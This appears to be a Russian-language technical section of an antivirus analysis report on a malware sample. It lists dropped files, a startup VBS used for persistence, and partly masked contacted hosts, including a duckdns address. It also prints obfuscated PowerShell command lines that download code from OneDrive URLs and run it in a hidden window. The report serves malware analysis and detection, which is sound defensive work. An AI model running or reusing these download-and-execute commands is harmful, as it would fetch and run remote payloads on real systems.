Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.vbs
- '%TEMP%\tmp3d55.tmp.exe'
- https://onedrive.live.com/download?cid=1f9dbbce014d667c&resid=1f9dbbce014d667c%211855&authkey=ahweqn3slvmldcs
- https://onedrive.live.com/download?cid=1f9dbbce014d667c&resid=1f9dbbce014d667c%211854&authkey=agwwxuio43zubdk
- %TEMP%\tmpd37e.tmp.vbs
- %TEMP%\tmp3d55.tmp.exe
- %TEMP%\tmp7975.tmp.vbs
- 'on####ve.live.com':443
- 'sk####.#y.files.1drv.com':443
- 'sa###.duckdns.org':5000
- DNS ASK on####ve.live.com
- DNS ASK sk####.#y.files.1drv.com
- DNS ASK sa###.duckdns.org
- '<SYSTEM32>\wscript.exe' "%TEMP%\tmpD37E.tmp.vbs"
- '<SYSTEM32>\wscript.exe' "%TEMP%\tmp7975.tmp.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=1F9DBBCE014D667C&resid=1F9DBBCE014D667C%211855&authkey=AHWEqN3sLvMLdcs'')'));...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=1F9DBBCE014D667C&resid=1F9DBBCE014D667C%211854&authkey=AGWwXuio43zUbdk'')'));...' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%TEMP%\tmp58BB.tmp.vbs"